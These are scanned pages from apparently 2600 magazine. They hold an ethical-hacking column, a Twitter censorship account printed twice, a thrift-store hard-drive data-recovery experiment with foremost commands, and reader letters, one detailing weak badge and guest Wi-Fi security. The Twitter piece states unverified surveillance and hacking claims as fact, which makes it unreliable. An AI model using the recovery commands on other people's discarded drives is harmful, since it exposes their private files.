in the first place. Along those same lines, 
the same code that makes us weak also 
makes us strong. If, for instance, you find 
a zero day vulnerability inside of your own 
machine, you could use that for nefarious 
means, or to benefit others by releasing the 
information. In that way, life is proven to 
be both a gift and a curse at times. Hackers 
prove this notion - some hack because they 
feel as though they’re cast down in the 
world. After all, isn’t it a psychological 
tenet of human nature that people who feel 
powerless want to gain power, even by 
force? But in doing so, some have fallen 
further than they ever stood to gain from 
their activities. I’ve heard of many hackers 
on the news getting long jail sentences for 
stealing. This is what changed my mind 
about being a black hat hacker. I learned 
that by doing the right thing, you close up 
the vulnerability within yourself for people 
to act against you. 

Really then, the smart hackers are the 
ones that try to build up their community, 
friends, and family - and not try to break it 
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down. Besides, there are other ways to keep 
progressing as a hacker without breaking 
the law. It may not be the most glamorous 
form of hacking to help family or friends 
remove viruses from their machines, but it 
feels way better than exploiting others. 

Other areas, such as open source contri- 
butions over GitHub, would be the primary 
way I see to hone one’s skills and still 
remain in the right by the law. Another way 
would be to create your own home network 
and hack it for fun. I plan on trying both of 
these things in the near future. 

My message to the younger genera- 
tion of hackers out there - and hackers in 
general - is to not view hacking as a polit- 
ical, social, or monetary tool, but mostly 
as a manifestation of self. Without getting 
too deeply into my personal psychological 
analysis of why people hack, I’d say it’s 
mostly because they’re curious. It wouldn’t 
seem proper to say that this curiosity always 
kills the cat. But there are many instances 
of people in history that were too curious 
for their own good. Take Marie Curie, for 
example. I consider her to be a hacker in a 
way, because she was curious about radia- 
tion. She and many other scientists ended 
up getting sick or dying over their experi- 
mentation with radioactive elements. Many 
scientists are hackers because they hold 
knowledge as tantamount to life. And both 
hackers and scientists run experiments, 
although hackers’ experiments often take 
the form of debugging a piece of software. 
We then must be careful that, if we live by 
the hack, we do not also die by it. 

Being a hacker is one of the many things 
I have experienced in my life. There is 
always the person that is purposely vulner- 
able who makes you question the whole 
basis of why you hack, or the person that 
has more skill than you who makes you feel 
like the victim. Going back to the begin- 
ning of the article when I was talking about 
the game Phantasy Star Online, it wasn’t 
playing the game that taught me a lesson. It 
was trying to game the game that taught me 
a lesson. Some lessons in life don’t come 
about no matter how many times you read 
a book or go down the same road. Hacking 
has taught me that, to learn, you must try 
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things in novel ways. You must experiment 
with your surroundings and transfer skills 
from one aspect of life to another. I’ve read 
in scientific papers that stepping outside 
your comfort zone is one of the best ways 
to master a new skill. If that is true, then 
hacking must be one of the best ways of 
learning there is. This is because in hacking 
you’re always adapting to a new architec- 
ture, programming language, or platform. 

If you’re an aspiring hacker trying to get 
into the scene, I recommend going down the 
path less traveled. As Smash Mouth sings 
in the famous song “All Star,” “...what’s 
wrong with taking the back streets? You'll 
never know if you don’t go.” So shine in 
whatever path you choose to take in hack- 
erdom, whether you’re simply hacking 
together a spreadsheet or getting paid to 
pen test some vulnerability in Google. To 
me, the exceptional hacker is the one who 
spends the most time on a seemingly trivial 
facet of something others overlook. After 
all, while everyone else is using Python 
for an artificial neural network, you can 
be the brave explorer who attempts to use 
PHP for the same endeavor. At least, that’s 
what I’m doing. We don’t learn in life by 
doing the same thing as everyone else. To 
be an exceptional hacker, my advice is to 
step outside of your comfort zone and do 
something new. 

There have been many good things that 
have come about because I hacked things 
when I was younger. I was able to get my 
information technology associate degree 
with relative ease. This involved taking 


We're looking for a few good columns 
to fill our pages for the next bunch of issues, 
Think you have what it takes? You might 
surprise yourself. “Hacker Perspective” is 
a column that focuses on the true meaning 
of hacking, as spoken in the words of our 
readers. We want to hear YOUR stories, 
ideas, and opinions. 

The column should be between 2000 and 
2500 words and answer such questions as: 
What is a hacker? How did you become one? 
What experiences and adventures did you live 
through? What message can you give to other 
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“Fundamentals of Programming” and 
“Web Design Basics” classes, which were 
already right up my alley. Also, whenever 
I see a problem, hacking has given me the 
insight to know that there is always more 
than one way to skin a catfish. Yes, the 
skills I learned in hacking are translatable 
to other areas of life. That’s why you don’t 
always need the right tool for the right job. 
What is needed, instead, is the right mind 
for the right job. 

If this article finds its way amongst 
the other great articles I’ve read in 2600 
Magazine over the years, I hope it helps 
someone. I’ve tried to incorporate some life 
lessons I’ve learned from being a hacker. 
Sometimes the lessons were harsh and 
other times they were easy. But in the end, 
“hacker” is just a word. The word means 
many different things to many different 
people. I ask that if you’re reading this and 
have a negative view of hackers, that you 
realize that we are people too. Some of us 
even have lives. We're not always the bad 
guys that the media portrays as stealing 
massive amounts of information online. 
We are sons, daughters, fathers, grandfa- 
thers, and most importantly, we are human 
beings. We vary as greatly as the life on our 
planet, and we are curious enough about 
life to teach you a thing or two about what 
we’ ve learned along the way. 

To this day, the author remains a hacker 
and curious about the world around him. 
He recently earned an Associate’s in infor- 
mation technology and continues to use his 
knowledge for good, rather than bad. 


aspiring hackers? These questions are just our 
suggestions - feel free to answer any others 
that you feel are important in the world of 
hackers. 

If we print your piece, we'll pay you 
$500, no questions asked (except where 
to send the $500). Send your submissions 
to articles@2600.com = (with “Hacker 
Perspective” in the subject) or to our mailing 
address at 2600, PO Box 99, Middle Island, 
NY 11953 USA. 

Submissions only open every few years so 
don’t delay! 
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by Michaleen Garda 
michaleen.garda@gmail.com 


At the beginning of this year, I decided to 
try my hand at Twitter. I had been avoiding 
it for some time, but I wanted to see what all 
the fuss was about and, being retired, I have 
plenty of time on my hands, Being a professor 
of media studies, I became most interested in 
the Twitter feeds for The New York Times, The 
Wall Street Journal, The Hill, The Washington 
Post, The Economist, Foreign Affairs (the 
primary publication of the Council on Foreign 
Relations), and every other major English 
language newspaper in the world. 

To my pleasant surprise, I found that 
Twitter was a wonderful way to write “letters 
to the editor” about inappropriate headlines 
or content, and the responses and followers 
I quickly began to gain because of my little 
tweets was very gratifying. Apparently, I had 
found something that I was very good at and 
people from all “sides” took great interest in 
my daily media critiques. 

Perhaps my newfound power went to my 
head, or perhaps I was merely exploring the 
extent of this Twitter system, but before too 
long I noticed that some of these publications 
actually began changing their headlines imme- 
diately after | had pointed out their blatant bias. 
At first this was very sneaky, as by changing 
their headline after I had commented on it, it 
was made to look like my comments made no 
sense at all. Further examination proved that 
it is common practice on all these feeds to 
repost stories that they feel the need to “POV 
push,” but with different headlines, sometimes 
different lead pictures, and naturally no old 
comments. But the story was identical. After 
I started cataloging these propagandist prac- 
tices, I once counted 15 different reposts of the 
same story on CFR with 15 different headlines. 
Was our media really lacking ideas to such an 
extent that they needed to repost so frequently, 
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or were these repostings always the subject 
matter that their organization desired pushed 
to the public the most? Wouldn’t any respect- 
able media organization only write one story 
and let it speak for itself? 

As flattering as it was that headlines were 
daily being changed based solely on one old 
man’s editorial opinion, things proceeded to 
get weirder. Drunk with my newfound power I 
decided to seek out the “most powerful people 
on earth” on Twitter and see what I had now 
come to see as their propaganda. I began with 
the Council on Foreign Relations, but moved 
on to people like Bill Gates and Jeff Bezos. 

Even on their own Twitter page, CFR main- 
tains a list of their ally corporations and it’s 
hard to deny that their consistent policy against 
green energy comes from the fact that all their 
allies are gas, oil, and nuclear companies. 

Well, I still don’t know what happened, but 
apparently these people fight back and fight 
back hard against what I now assume they 
view as “information warfare,” because tweets 
of mine kept disappearing and many of my 
followers began complaining that they were 
not able to see my tweets at all, or replies to 
tweets. The very rapid rate of follower accu- 
mulation slowed to a trickle. A little bit of 
research informed me there is an open secret 
on Twitter known as “shadowbanning,” the 
fairly common practice of some (yet uniden- 
tified) power to censor and edit any Twitter 
“troublemakers.” Once shadowbanned, _ it 
is nearly impossible to get your rights and 
freedom back. I was very proud of the edito- 
rial work I had done and many others were as 
well. I had not used profanity, trolling, or any 
partisanship whatsoever. I simply like to speak 
truth to power, but apparently power does not 
like that at all. Completely at a loss, a young 
techie friend taught me how to download the 
complete archive of my work on Twitter and, 
once accomplished, I was very much relieved 
to see all my hard work still documented in my 
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private archive. I still have this archive, backed 
up in multiple locations (though the copy I 
kept on my person on USB was stolen from my 
bag as I slept), but what came next causes me 
to be very careful about how exactly I should 
use this data. 

Because my account had become “compro- 
mised” by forces unknown, and Twitter 
support was unable or unwilling to do anything 
about it, I contacted a younger colleague (Jake) 
who is more of a techie than I am and charged 
him with focusing on CFR to see if they were 
the main aggressors. For their mistakes, half- 
truths, biases, and outright lies are incredibly 
easy to see through. Jake began his experiment 
and, in no time at all, he also was shandow- 
banned. I had no idea that censorship was so 
alive and well in the 21st century. 

But Jake had worse news for me. While 
investigating my home network, he discovered 
that every router hop after my [SP was obfus- 
cated immediately after being passed to my 
ISP and, when attempting to SSH to a reliable 
shell, we received the warning that a “man in 
the middle” attack was taking place. A further 
clue was a visit to thepiratebay which suddenly 
had zero leachers and zero seeders. Patently 
impossible, unless our MITM was blocking 
peer-to-peer. Soon enough, Jake’s laptop was 
spectacularly hacked, bricking it, by inserting 
a virus into the RAM as far as we can tell. 
When he tried to download a new distro image 
of Ubuntu Linux, the download would not 
complete. When he tried to download a distro 
of Kali Linux, the download completed but 
the GPG keys did not match. Clearly someone 
very advanced was fussing with us, and not 
above giving us a pre-rootkit install distro of 
Kali. 

Without getting into too much detail, things 
continued to escalate until he was approached, 
on multiple occasions, by actual humans - 
some threatening, some complimentary, all of 
them strangers and all of them very ominous. 
I stayed at my remote farm, but the interroga- 
tions I received from anonymous Twitter users 
escalated drastically and were nothing less 
than professional: one even directly threatened 
the life of a young grandniece of mine and 
threatened me with “police torture.” 

Some innocent, “protected by the First 
Amendment” activities on Twitter had 
devolved in three months to secret censor- 
ship, illegal computer security breaches, and 
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human operatives. At a total loss, we contacted 
first the FBI and later filed a complete report 
with the DOJ’s IC3 computer crimes division, 
including screenshots of the various tracer- 
outes which proved our data was being consis- 
tently manipulated in very strange ways. None 
of these to date has had any meaningful effect. 
Neither did trying to work with my ISP. After 
three different “engineers,” none of whom 
could perform a basic traceroute command or 
explain why they were routing all of our data to 
servers with obfuscated IP addresses (though 
they could not deny that this was exactly what 
was occurring), the final “engineer” got very 
belligerent with us for even mentioning the 
National Security Agency. “You can’t just say 
‘NSA!!’” He sputtered indignantly. 

What did I learn from all this? A hypoth- 
esis I call “meme control.” I have come to 
view World War Three as largely a battle of 
information and memes. A battle for control 
of minds. Those with the power to censor 
Twitter (identically with those who use the 
same power to censor Wikipedia) are doing so 
because they know that the meme is one of the 
most powerful information viruses known to 
humankind. And someone is in the business of 
creating and maintaining “approved” memes 
for the public. “Dangerous” memes are inves- 
tigated and neutralized. Imagine if just one 
Twitter user was able to easily unite different 
viewpoints and elucidate clearly the program 
of propaganda and mind control that is so 
clearly in use in our mass media. Imagine he 
got a billion followers. Now imagine he is an 
“anarchist.” This situation is simply untenable 
to those in power, and they have my sympathy 
for this position, but the fact that this “shad- 
owbanning” is secret is a very real problem. 
And that forces are willing to send out paid 
human operatives to investigate, intimidate, 
and dissuade simple Twitter users is an even 
bigger problem. 

I am incredibly proud of the work I did 
on Twitter, yet a glance at my profile today 
shows almost nothing. Everything good has 
been completely erased, and several tweets 
added that I certainly never submitted. The 
vast majority of my Internet accounts were 
hacked and passwords changed, including the 
account | used to submit my first article which 
appeared in 2600 entitled “Hack(ed) The 
Earth.” I had no idea when I wrote that how 
very prophetic it was. 
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by Michaleen Garda 
michaleen.garda@gmail.com 


At the beginning of this year, I decided to 
try my hand at Twitter. I had been avoiding it 
for some time, but I wanted to see what all the 
fuss was about and, being retired, I have plenty 
of time on my hands. Being a professor of media 
studies, I became most interested in the Twitter 
feeds for The New York Times, The Wall Street 
Journal, The Hill, The Washington Post, The 
Economist, Foreign Affairs (the primary publi- 
cation of the Council on Foreign Relations), and 
every other major English language newspaper 
in the world. 

To my pleasant surprise, I found that Twitter 
was a wonderful way to write “letters to the 
editor” about inappropriate headlines or content, 
and the responses and followers I quickly began 
to gain because of my little tweets was very grat- 
ifying. Apparently, I had found something that 
I was very good at and people from all “sides” 
took great interest in my daily media critiques. 

Perhaps my newfound power went to my 
head, or perhaps I was merely exploring the 
extent of this Twitter system, but before too long 
I noticed that some of these publications actu- 
ally began changing their headlines immediately 
after I had pointed out their blatant bias. At first 
this was very sneaky, as by changing their head- 
line after I had commented on it, it was made 
to look like my comments made no sense at all. 
Further examination proved that it is common 
practice on all these feeds to repost stories that 
they feel the need to “POV push,” but with 
different headlines, sometimes different lead 
pictures, and naturally no old comments, But 
the story was identical. After I started cataloging 
these propagandist practices, I once counted 15 
different reposts of the same story on CFR with 
15 different headlines. Was our media really 
lacking ideas to such an extent that they needed 
to repost so frequently, or were these repostings 
always the subject matter that their organization 
desired pushed to the public the most? Wouldn’t 
any respectable media organization only write 
one story and let it speak for itself? 

As flattering as it was that headlines were 
daily being changed based solely on one old 
man’s editorial opinion, things proceeded to 
get weirder. Drunk with my newfound power I 
decided to seek out the “most powerful people 
on earth” on Twitter and see what I had now 
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come to see as their propaganda. I began with 
the Council on Foreign Relations, but moved on 
to people like Bill Gates and Jeff Bezos. 

Even on their own Twitter page, CFR main- 
tains a list of their ally corporations and it’s hard 
to deny that their consistent policy against green 
energy comes from the fact that all their allies 
are gas, oil, and nuclear companies. 

Well, I still don’t know what happened, but 
apparently these people fight back and fight back 
hard against what I now assume they view as 
“information warfare,” because tweets of mine 
kept disappearing and many of my followers 
began complaining that they were not able to see 
my tweets at all, or replies to tweets. The very 
rapid rate of follower accumulation slowed to a 
trickle. A little bit of research informed me there 
is an open secret on Twitter known as “shadow- 
banning,” the fairly common practice of some 
(yet unidentified) power to censor and edit any 
Twitter “troublemakers.” Once shadowbanned, 
it is nearly impossible to get your rights and 
freedom back. I was very proud of the edito- 
rial work I had done and many others were as 
well. I had not used profanity, trolling, or any 
partisanship whatsoever. I simply like to speak 
truth to power, but apparently power does not 
like that at all. Completely at a loss, a young 
techie friend taught me how to download the 
complete archive of my work on Twitter and, 
once accomplished, | was very much relieved 
to see all my hard work still documented in my 
private archive. I still have this archive, backed 
up in multiple locations (though the copy I kept 
on my person on USB was stolen from my bag 
as I slept), but what came next causes me to be 
very careful about how exactly I should use this 
data. 

Because my account had become “compro- 
mised” by forces unknown, and Twitter support 
was unable or unwilling to do anything about 
it, I contacted a younger colleague (Jake) who 
is more of a techie than | am and charged him 
with focusing on CFR to see if they were the 
main aggressors. For their mistakes, half-truths, 
biases, and outright lies are incredibly easy to 
see through. Jake began his experiment and, in 
no time at all, he also was shandowbanned. I had 
no idea that censorship was so alive and well in 
the 21st century. 

But Jake had worse news for me. While 
investigating my home network, he discovered 
that every router hop after my ISP was obfus- 
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cated immediately after being passed to my 
ISP and, when attempting to SSH to a reliable 
shell, we received the warning that a “man in the 
middle” attack was taking place. A further clue 
was a visit to thepiratebay which suddenly had 
zero leachers and zero seeders. Patently impos- 
sible, unless our MITM was blocking peer-to- 
peer. Soon enough, Jake’s laptop was spectac- 
ularly hacked, bricking it, by inserting a virus 
into the RAM as far as we can tell. When he 
tried to download a new distro image of Ubuntu 
Linux, the download would not complete. When 
he tried to download a distro of Kali Linux, the 
download completed but the GPG keys did not 
match. Clearly someone very advanced was 
fussing with us, and not above giving us a pre- 
rootkit install distro of Kali. 

Without getting into too much detail, things 
continued to escalate until he was approached, 
on multiple occasions, by actual humans - 
some threatening, some complimentary, all of 
them strangers and all of them very ominous. 
I stayed at my remote farm, but the interroga- 
tions I received from anonymous Twitter users 
escalated drastically and were nothing less than 
professional: one even directly threatened the 
life of a young grandniece of mine and threat- 
ened me with “police torture.” 

Some innocent, “protected by the First 
Amendment” activities on Twitter had devolved 
in three months to secret censorship, illegal 
computer security breaches, and human opera- 
tives. At a total loss, we contacted first the FBI 
and later filed a complete report with the DOJ’s 
IC3 computer crimes division, including screen- 
shots of the various traceroutes which proved 
our data was being consistently manipulated 
in very strange ways. None of these to date has 
had any meaningful effect. Neither did trying to 
work with my ISP. After three different “engi- 
neers,” none of whom could perform a basic 


traceroute command or explain why they were 
routing all of our data to servers with obfuscated 
IP addresses (though they could not deny that 
this was exactly what was occurring), the final 
“engineer” got very belligerent with us for even 
mentioning the National Security Agency. “You 
can’t just say “NSA!!"” He sputtered indignantly. 
What did I learn from all this? A hypothesis I 
call “meme control.” I have come to view World 
War Three as largely a battle of information and 
memes. A battle for control of minds. Those 
with the power to censor Twitter (identically 
with those who use the same power to censor 
Wikipedia) are doing so because they know that 
the meme is one of the most powerful informa- 
tion viruses known to humankind. And someone 
is in the business of creating and maintaining 
“approved” memes for the public. “Dangerous” 
memes are investigated and neutralized. Imagine 
if just one Twitter user was able to easily unite 
different viewpoints and elucidate clearly the 
program of propaganda and mind control that is 
so clearly in use in our mass media. Imagine he 
got a billion followers. Now imagine he is an 
“anarchist.” This situation is simply untenable to 
those in power, and they have my sympathy for 
this position, but the fact that this “shadowban- 
ning” is secret is a very real problem. And that 
forces are willing to send out paid human opera- 
tives to investigate, intimidate, and dissuade 
simple Twitter users is an even bigger problem. 
I am incredibly proud of the work I did on 
Twitter, yet a glance at my profile today shows 
almost nothing. Everything good has been 
completely erased, and several tweets added that 
I certainly never submitted. The vast majority 
of my Internet accounts were hacked and pass- 
words changed, including the account I used to 
submit my first article which appeared in 2600 
entitled “Hack(ed) The Earth.” I had no idea 
when I wrote that how very prophetic it was. 


Ontine Thrift Stores Have Your Data 


by base64xor 


When it is decided that a PC or laptop is of no use, do individuals or organizations alike dispose 
of or resell the system and the hard drives? From reviewing online offers, there are those that decide 
to resell or donate the system or drives to a thrift reseller. 

Perhaps you have used a computer or uploaded a file to a computer of a friend or family member, 
at a library, a photo kiosk, a print store, or other fine establishments. When those systems are of 
no use, the system or hard drives from that system may be donated to a thrift store. You may have 
personal data at risk of exposure to others unknown to you and outside of your control. 

So are hard drives that are sold by a thrift reseller routinely wiped of all data? Could one buy 
hard drives from an online thrift store and then recover files from the hard drive? To determine how 
easy it is to recover files from used drives bought at a thrift store, I decided to buy a few hard drives 
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online and attempt to recover data. 

To start off this research, I picked a popular website that sells hard drives from locations around 
the country. I selected two older Western Digital drives that were offered from a thrift store in South 
Florida. I purchased the two drives for $21 including shipping and handling. 

Description: WD Caviar SE 250GB & 320GB Desktop Hard Drives 

Brand: Western Digital 

Condition: No visible damages. Items tested and formattedmultiple times 
Partition Tablet Type: MBR 

File System Type: NTFS 

The online description of the hard drives stated the drives were “formatted several times,” so 
perhaps the data was wiped before the drives were placed for sale. But of course, formatting does 
not erase data. In order to temporarily connect the drives externally to a computer, I purchased a 
USB to SATA cable kit at an online store for under $10. : 

I needed the kit in order to connect the drives to an older iMac of mine that is running the 
Ubuntu Mate Linux distribution. When the drives arrived, I connected the first drive to my iMac. 
The cable kit worked, and the Ubuntu Mate system recognized the hard drive. 

The Linux file explorer displayed an empty folder for the hard drive. Nothing there, no files 
present! So I needed to install a program designed to recover deleted data. In order to attempt data 
recovery from the hard drives, I installed the program foremost which allows for recovery of 
deleted files from a device or disk image. 

The command that I ran to install foremost: sudo apt-get install foremost. After 
the program was installed, I then ran a foremost command to recover office files: 
sudo foremost -v -t ole -i /dev/sdb1 

Foremost ran for one hour and 18 minutes, and created a directory called “output” with subdi- 


rectories of file types and the “audit.txt” file. The program recovered 123 office files. Since the 
recovery of the office files answers my question as to whether the disk was wiped, I did not attempt 
to recover additional file types. 

Extracted from the Audit file: 


File: /dev/sdb1 
Start: Tue Nov 13 18:22:14 2018 
Length: 232 GB (250058113024 bytes) 


Finish: Tue Nov 13 19:40:42 2018 
123 FILES EXTRACTED 


I disconnected the first drive and then connected the second drive to my iMac. Once again, the 
system displayed an empty folder when I first connected the drive. I then ran the same foremost 
command to recover office files, and the program ran for two hours and 40 minutes, recovering 
1321 office files. 

Extracted from the Audit file: 


File: /dev/sdbl 
Start: Thu Nov 15 04:18:50 2018 


Finish: Thu Nov 15 06:58:14 2018 
1321 FILES EXTRACTED 
ole:= 1321 


So from this research, I found that online thrift stores may sell hard drives that are not zeroed 
of all data. I was able to recover office files from both hard drives. In order to ensure that all data is 
wiped from a hard drive, a program must be used which writes data across the entire disk several 
times. Such a program is usually described as meeting U.S. government specifications for erasing 
digital data from storage devices. In this case, the drives were not wiped of data and I demonstrated 
how easy it is to recover files. 

So think twice before you use a computer system that is not or will not remain under your direct 
and personal control until the hard drives are either destroyed or properly wiped of data. 
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Observations 
Dear 2600: 

I'm amazed that you're still around! Reality 
caught up with you. I knew 2600 and was it Richard 
Goldstein who ran it back when I had a couple of 
programs on WBAI in New York City in the 1980s 
and we were both looking at similar events happen- 
ing? 

Go well. 

Bill 

Well, some of that resembles the truth. But thanks 
for the sentiment. (And how exactly did reality catch 
up with us?) 

Dear 2600: 

The “Meetings” section of the latest edition 
(36:2) seems to contain some silliness that I am un- 
fortunately familiar with; specifically the message 
from “Sebastien.” 

I recently experienced the joy of opening UTF- 
8 encoded CSVs in Excel and having the software 
decide it was meant to be read as Windows-1252 due 
to a lack of byte order mark, so I suspect Microsoft 
is probably somehow to blame for the mangling of 
“Sebastien.” I found this website quite handy when 
I was trying to get some background on the issue: 
www.il 8nga.com/debug/utf8-debug.html. 

Loving the magazine so far - this is my first year 
as a subscriber. 


Erik 

At least we know people are paying attention. 
Dear 2600: 

The recent announcement by Facebook to roll 
out their own virtual currency called “Libra” brings 
a huge question. What are the major downsides to 
having such a currency available to users? Let’s first 
start with a major technology company having con- 
trol over their own currency without having the so- 
called same oversight as major financial institutions 
which can lead to various issues like data breaches, 
volatility, privacy matters, processing of transac- 
tions, etc. 

Data breaches routinely happen within all indus- 
tries anyway, but when a technology company such 
as Facebook (or any social networking site) has plans 
to roll out their own currency, this can be magnified 
since there isn’t the same level of regulation which a 
normal financial institution would experience when 
data gets stolen leading to a potential hardship to a 
customer’s wealth. Secondly, there is much volatil- 
ity regarding virtual currency. Who says it’s going 
to stay stable for users or even potential users in the 
future, since there would be no guarantee it wouldn’t 
decline even a little bit? Users want stable currency 
for financial transactions, not ones which tend to 
fluctuate drastically, either up or down. That’s more 
like playing the stock market instead of relying on 
stable financial transactions. Third, there is the 
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of privacy when it comes to such a currency. This, 
of course, has been major news for social network- 
ing platforms already and, by having them offer such 
services, they would be able to further keep tabs/ 
tracking on an individual’s daily financial transac- 
tions leading to less and less privacy to users. 

Social networking platforms should not be in the 
business of financial matters of any kind and could 
lead to many negative results 


Bill Miller 


Dear 2600: 

I saw this today at Electronic Parts Outlet in 
Houston and thought you might be interested. 
Twelve issues of 2600 for just $30! 


The shrink wrap is a nice touch. But it goes to 
show that those printed issues are always out there 
and will be snatched up by somebody. We're almost 
tempted ourselves. 


2600 Magazine 


Dear 2600: 

You appear to have used my picture in 36:2. On 
the back you state that I will receive a one year sub- 
scription if you use my picture. Is this valid for the 
payphone pictures as well? 


Reader 

Yes, you are correct, we do appear to have done 
exactly that. However, we don't move nearly as fast 
as some people expect insofar as sending out notifi- 
cations. It usually takes a couple of weeks after the 
issue has been released. Sometimes, when all hell 
breaks loose (which has been the case this summer), 
it could take a little longer. But all notifications have 
now been sent out and you should be completely up 
to date (and yes, your payphone photo qualifies). We 
hope you send in more pictures and maybe even an 
article, And we promise to move faster next time. 
Dear 2600: 

In the Summer 2019 issue (36:2), there is an 
article called “Potential VPN Attacks” written by 
someone with the name “aesthetic.” It is very similar 
to mine - so similar, in fact, that I’ve had a couple 
people contact me congratulating me on getting a 
great article published. So just to clarify, I am not 
“aesthetic,” and while | always appreciate a kind 
note, people who liked that article should be thank- 
ing the right person. 


aestetix 
Hacker identity is indeed a complex issue. 
Dear 2600: 

I just finished reading “Let’s Just Call It Bitcon” 
by XtendedWhere in 36:2. Like most people on 
Planet Earth, I’ve read a lot and heard a lot about 
Bitcoin. Never before have I read such an honest and 
insightful view of Bitcoin and “klepto-currencies” 
(as the author calls them). 

It seems that there are truly some flaws with the 
whole system that might be impossible to overcome 
except in the few examples he gives. This article is 
true journalistic excellence and it’s so refreshing to 
see it in the pages of 2600. 

Please keep it up! 


Ron 

Always happy to present divergent opinions. And 
always wanting to see more, 

Dear 2600: 

I wanted to send you all a quick thank-you note 
for publishing my article “Hacking in a Slow Job 
Market” in 35:4. Can you believe I wrote that five 
years ago? I honestly figured it might have been lost, 
buried in a pile of mail, or your editor was disin- 
terested in transcribing my handwriting! Imagine 
my surprise when I received a free issue to my post 
office box! Looking back at the article, I’m not as 
pleased with it as I was when I wrote it, but I did 
learn one important thing from my own article - to 
remember to date any correspondence! Happy hack- 
ing! 

Kamonra 

Five years is pretty extreme, but sometimes 
handwritten articles wind up in a pile that takes a 
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for space to open up, which can happen to any po- 


little longer to enter into our system. It’s possible it 
was entered much earlier, but was waiting in a queue 


tential article. But this is the exception, not the rule. 
We still want lots more articles to come pouring in. 
Dear 2600: 

Saw this article in the recent Tulsa World. We 
cannot help but believe that you all are behind this 
in some strange way! By next week it will be 2600 
teachers without their certificates. 


M. Rottschaefer 
The headline read “Close to 2,600 nonaccred- 
ited teachers working” and, if hitting that magical 
number is what it takes to make people aware of the 
serious teacher shortage we're facing, then we're 
happy to help. 
Dear 2600: 
Why has 2600 decided to bleachbit all mention 
of the Imran Awan affair, which is the most signifi- 
cant IT security news event of the last quarter cen- 


tury? 


Lifetime Subscriber 

It’s so great when people assume that everything 
we do or don't do is the result of a carefully consid- 
ered decision-making process. We're not even sure 
if this accusation is confined to our own pages or 
is meant to imply that we've managed to keep the 
story out of all media, Regardless, there has been no 
such intentional action or inaction. We simply can't 
cover everything. But that doesn’t mean we won't 
bring attention to a story if someone writes in with 
the info. This was a golden opportunity to do just 
that, but your one sentence letter only scratched the 
surface. So we'll just share what is generally known, 
which is that this guy was arrested for making a false 
Statement on a bank loan application. Because he 
had a connection with some Democratic members 
of the House of Representatives, there have been 
all kinds of conspiracy theories spread about him, 
which apparently we're now a part of. To put this 
into perspective, the judge who sentenced him actu- 
ally came to his defense, describing these conspiracy 
theories as “an unbelievable onslaught of s 
media attacks to which he and his family have been 
subjected.” He even added that there had been “ac- 
cusations lobbed at him from the highest branches of 
the government, all of which have been proved to be 
without foundation by the FBI and the Department 
of Justice.” 

So, by printing this, we're probably deep into the 
cover-up now. 

Dear 2600: 

Greetings from Hooli in Folsom! 

Having come from over a decade of retail back- 
ground to a corporate environment with experimen- 
tal technology, I thought certain things would have 
turned out differently. It was with naive enthusiasm 
that I had left behind what I believed to be the bot- 
tom of the employment barrel for what I perceived to 
be more dignified and professional standards. 

Though my story is likely a dime a dozen, it 
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currilous 


still strikes me as shocking how my current em- 
ployer gets into frequent trouble with the many in- 
ternal conflicts, lawsuits, and “corporate espionage.” 
There are also many Game of Thrones-like micro- 
conflicts amongst the multitude of laboratories here. 
Between the “CWs” (aka contingent workers), the 
direct-hires, individuals here on working visas, and 
“guests” from other locations, there’s a constant 
chess game of calculating rank and subjective su- 
periority that seems to change with the projects and 
work weeks, 

Despite this multi-billion dollar company spend- 
ing tons of money on these petty squabbles, it 
fails horribly in its security. You can read about it 
in the Sacramento Bee or other forms of media or 
publishing. Despite their attempts to maintain their 
workforce, individuals continue to leave for false 
promises with competitors, only to be cheated out of 
promised employment. 

If that wasn’t bad enough, the security practices 
are lacking and sub-par. It also doesn’t help that 
most of those responsible to uphold them are among 
the reasons they were enacted in the first place. Ona 
side note, why would one make a 12-foot-long ban- 
ner advertising a top-secret project for anyone who 
walks into the lobby to see? 

As a curious and ponderous individual, I am 
constantly observing and poking at the security mea- 
sures before I even enter the front door. To enter the 
labs after getting into the lobby, you need to wave 
your badge over the reader. Normally, your person- 
alized badge has a crappy picture of yourself on it, 
along with your full name. These pictures are too 
small to be clearly seen from six feet away and are 
often faded. If you lose your badge, you can request 
a temporary, which omits basically all visible per- 
sonalization from it - you are “supposed” to return 
them at the end of the day, but they do get lost. If 
some mal-intent individual were to come across a 
temp badge, they might be tempted to use it soon 
- fortunately, the temp badges expire after 24 hours. 
Use it before you lose it. On that note, I noticed that 
the RFID badges still work even when I have mine 
in my pocket. One could conceal the poor picture 
while still using the badge. Of course, employees oc- 
casionally hold the door open for each other, which 
is a no-no, a fact that is only posted inside the labs. 

Wireless security is a joke. There’s no MAC or 
IP filtering of any sort. There is the typical website 
blacklist though - but that can be easily averted. The 
ranges of the wireless APs stretch far beyond what’s 
necessary. Why is this a concern? Because if you can’t 
physically get in, you could at least get into the net- 
work. These slightly smaller (though still too large) 
targets are often the ones with classified files in the 
connected drives. Getting a “guest” access account is 
easier than getting a temp badge - and allows for the 
potential to access such network folders. I’ve tested 
this out - it still works. Now that our internalized “IT 
team” is being outsourced overseas with our net ad- 
min, I suspect more problems will emerge eventually. 


Page 36 


I can go on and on about Folsom Fails, but my 
point is that in my years of retail, | was never ex- 
posed to the kind of negligence and hypocrisy that 
I'd only read about prior. I had imagined the grass to 
be greener on the other side (and in many ways it is), 
but reality is not as pretty as aspirations. Being the 
security conscious and pro-free-software tech that I 
am puts me in an awkward position at the moment, 
but I’m doing what I can to bring awareness to those 
around me. 


Der 

While specific details have been mercifully left 
out, we're always happy to print info that really ex- 
poses security holes at named companies or organi- 
zations and forces some necessary changes. Thanks 
for keeping your eyes open and for sharing. 

Dear 2600: 

I moved to this area in July 2017 and have passed 
by this store every day until fairly recently. One day, 
I noticed that their gas prices had dropped - and I 
needed beer, too. So after looking at my receipt, I 
noticed their address. Wow! It’s 2600. Now I stop by 
the store every time I need gas and beer. 

Lifetime member 
Jim 


QUICK STOP 
2600 HWY 378 
GILBERT, SC 29054 
(803] 892-6581 
125083 
Quick Stop 
2500 HAY 378 
Gilbert SC 29054 


aeePRE-AUTHON IZED. RECEIPT ##* 


<CUSTOMER COPY> 


Description Qt: Amount 
PREPAY CA #03 20.00 

T 16 oz Bush Ice can 2 2.10 
Subtotal 22.10 

Tax 0.15 

TOTAL 22.25 


PREAUTH $ 22.25 


PREPAY Receipt 

eDEALT.USDS22.25, 

Wouldn't it be nice if every business that had our 
name as part of their address was guaranteed the 
support of our community? 

Dear 2600: 

In the Winter 2018-19 issue of 2600, Pop Rob 
mentions that the USPS photographs the covers of 
U.S. mail in order to speed delivery, but erases the 
